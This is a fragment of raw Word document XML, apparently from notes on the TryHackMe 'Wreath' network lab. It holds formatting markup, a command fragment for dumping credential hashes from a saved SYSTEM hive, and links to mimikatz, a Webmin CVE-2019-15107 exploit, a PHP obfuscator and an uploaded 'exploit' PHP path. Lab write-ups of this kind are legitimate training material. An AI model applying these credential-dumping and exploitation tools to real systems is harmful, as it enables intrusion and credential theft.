      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000235DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000235DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000235DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0C8D7B" w14:textId="3E491485" w:rsidR="000235DA" w:rsidRPr="00015D9E" w:rsidRDefault="000235DA" w:rsidP="00015D9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000235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4A51094" wp14:editId="4308F620">
            <wp:extent cx="5943600" cy="15265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1BD5" w14:textId="67A9776F" w:rsidR="00BB6B7D" w:rsidRPr="00E9605A" w:rsidRDefault="00BB6B7D" w:rsidP="00BD1CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00BB6B7D" w:rsidRPr="00E9605A" w:rsidSect="004E01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778"/>
    <w:rsid w:val="000061D0"/>
    <w:rsid w:val="00007AA1"/>
    <w:rsid w:val="0001297D"/>
    <w:rsid w:val="00012DD7"/>
    <w:rsid w:val="00015D9E"/>
    <w:rsid w:val="000235DA"/>
    <w:rsid w:val="00030AF3"/>
    <w:rsid w:val="000369B7"/>
    <w:rsid w:val="00045446"/>
    <w:rsid w:val="00095AC5"/>
    <w:rsid w:val="000A2500"/>
    <w:rsid w:val="000D1B3A"/>
    <w:rsid w:val="000F21AC"/>
    <w:rsid w:val="001241B5"/>
    <w:rsid w:val="00142778"/>
    <w:rsid w:val="00145DA8"/>
    <w:rsid w:val="001657FC"/>
    <w:rsid w:val="00170310"/>
    <w:rsid w:val="00176FC7"/>
    <w:rsid w:val="001E7F5C"/>
    <w:rsid w:val="00207383"/>
    <w:rsid w:val="00253230"/>
    <w:rsid w:val="0025467D"/>
    <w:rsid w:val="0026009F"/>
    <w:rsid w:val="002E3859"/>
    <w:rsid w:val="002E645C"/>
    <w:rsid w:val="002F05AE"/>
    <w:rsid w:val="00330F8A"/>
    <w:rsid w:val="003567B7"/>
    <w:rsid w:val="00365742"/>
    <w:rsid w:val="00371CA4"/>
    <w:rsid w:val="00387406"/>
    <w:rsid w:val="003A7F31"/>
    <w:rsid w:val="003B25F5"/>
    <w:rsid w:val="003D4910"/>
    <w:rsid w:val="003D79FD"/>
    <w:rsid w:val="00447C3D"/>
    <w:rsid w:val="00462711"/>
    <w:rsid w:val="004A7C76"/>
    <w:rsid w:val="004B68EF"/>
    <w:rsid w:val="00516568"/>
    <w:rsid w:val="00534469"/>
    <w:rsid w:val="00547E70"/>
    <w:rsid w:val="00563F37"/>
    <w:rsid w:val="00580574"/>
    <w:rsid w:val="005C5DB7"/>
    <w:rsid w:val="005E567B"/>
    <w:rsid w:val="005F00A2"/>
    <w:rsid w:val="005F094D"/>
    <w:rsid w:val="0063193A"/>
    <w:rsid w:val="00661EF2"/>
    <w:rsid w:val="00670635"/>
    <w:rsid w:val="006D69E7"/>
    <w:rsid w:val="007113BE"/>
    <w:rsid w:val="007444AC"/>
    <w:rsid w:val="007721FB"/>
    <w:rsid w:val="00772445"/>
    <w:rsid w:val="00793EF2"/>
    <w:rsid w:val="007B62E5"/>
    <w:rsid w:val="007F40C7"/>
    <w:rsid w:val="007F5D1D"/>
    <w:rsid w:val="00833757"/>
    <w:rsid w:val="008417D3"/>
    <w:rsid w:val="008661A5"/>
    <w:rsid w:val="008B5407"/>
    <w:rsid w:val="008C367F"/>
    <w:rsid w:val="008C587E"/>
    <w:rsid w:val="00927BA2"/>
    <w:rsid w:val="00930602"/>
    <w:rsid w:val="0097099B"/>
    <w:rsid w:val="009A6D42"/>
    <w:rsid w:val="009E3A03"/>
    <w:rsid w:val="009E4C8E"/>
    <w:rsid w:val="00A00807"/>
    <w:rsid w:val="00A31BEB"/>
    <w:rsid w:val="00A368BB"/>
    <w:rsid w:val="00AD3317"/>
    <w:rsid w:val="00AE584B"/>
    <w:rsid w:val="00B05477"/>
    <w:rsid w:val="00B2650F"/>
    <w:rsid w:val="00B274DD"/>
    <w:rsid w:val="00B73680"/>
    <w:rsid w:val="00B93BCC"/>
    <w:rsid w:val="00BB6B7D"/>
    <w:rsid w:val="00BC5855"/>
    <w:rsid w:val="00BD1CE7"/>
    <w:rsid w:val="00BF283F"/>
    <w:rsid w:val="00C26325"/>
    <w:rsid w:val="00C273E9"/>
    <w:rsid w:val="00C3065A"/>
    <w:rsid w:val="00C710A5"/>
    <w:rsid w:val="00C9545D"/>
    <w:rsid w:val="00CB0A10"/>
    <w:rsid w:val="00CC1399"/>
    <w:rsid w:val="00CC4F8B"/>
    <w:rsid w:val="00CE5F3A"/>
    <w:rsid w:val="00CF43FE"/>
    <w:rsid w:val="00CF4F48"/>
    <w:rsid w:val="00D10452"/>
    <w:rsid w:val="00D34DA3"/>
    <w:rsid w:val="00D41D49"/>
    <w:rsid w:val="00D4246A"/>
    <w:rsid w:val="00D449B2"/>
    <w:rsid w:val="00D51607"/>
    <w:rsid w:val="00D637A1"/>
    <w:rsid w:val="00D81903"/>
    <w:rsid w:val="00D96606"/>
    <w:rsid w:val="00DB14D1"/>
    <w:rsid w:val="00DC091F"/>
    <w:rsid w:val="00DD2134"/>
    <w:rsid w:val="00DF5F30"/>
    <w:rsid w:val="00E70656"/>
    <w:rsid w:val="00E8492C"/>
    <w:rsid w:val="00E9605A"/>
    <w:rsid w:val="00EA5046"/>
    <w:rsid w:val="00F00FFB"/>
    <w:rsid w:val="00F15951"/>
    <w:rsid w:val="00F16E26"/>
    <w:rsid w:val="00F35BF7"/>
    <w:rsid w:val="00F44FFE"/>
    <w:rsid w:val="00FD57A7"/>
    <w:rsid w:val="00FF4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E6916"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{99F93ABE-36E9-4675-B053-9365E6D9E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42778"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto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2778"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia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14277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2778"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/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27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2778"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia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42778"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/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42778"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia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B93B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9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file:///\\tsclient\share\mimikatz\x64\mimikatz.exe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mailto:root@10.200.84.200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hyperlink" Target="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap?raw=tru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gaijin.at/en/tools/php-obfuscator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hyperlink" Target="mailto:root@10.200.84.200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theme" Target="theme/theme1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="https://assets.tryhackme.com/additional/wreath-network/312cae5fdfc7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hyperlink" Target="https://github.com/MuirlandOracle/CVE-2019-15107" TargetMode="Externa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mailto:user@172.16.0.5" TargetMode="External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hyperlink" Target="http://IP/web/exploit-USERNAME.php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36</Pages>
  <Words>3097</Words>
  <Characters>17655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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>dai</cp:lastModifiedBy>
  <cp:revision>128</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-28T13:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-06T16:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>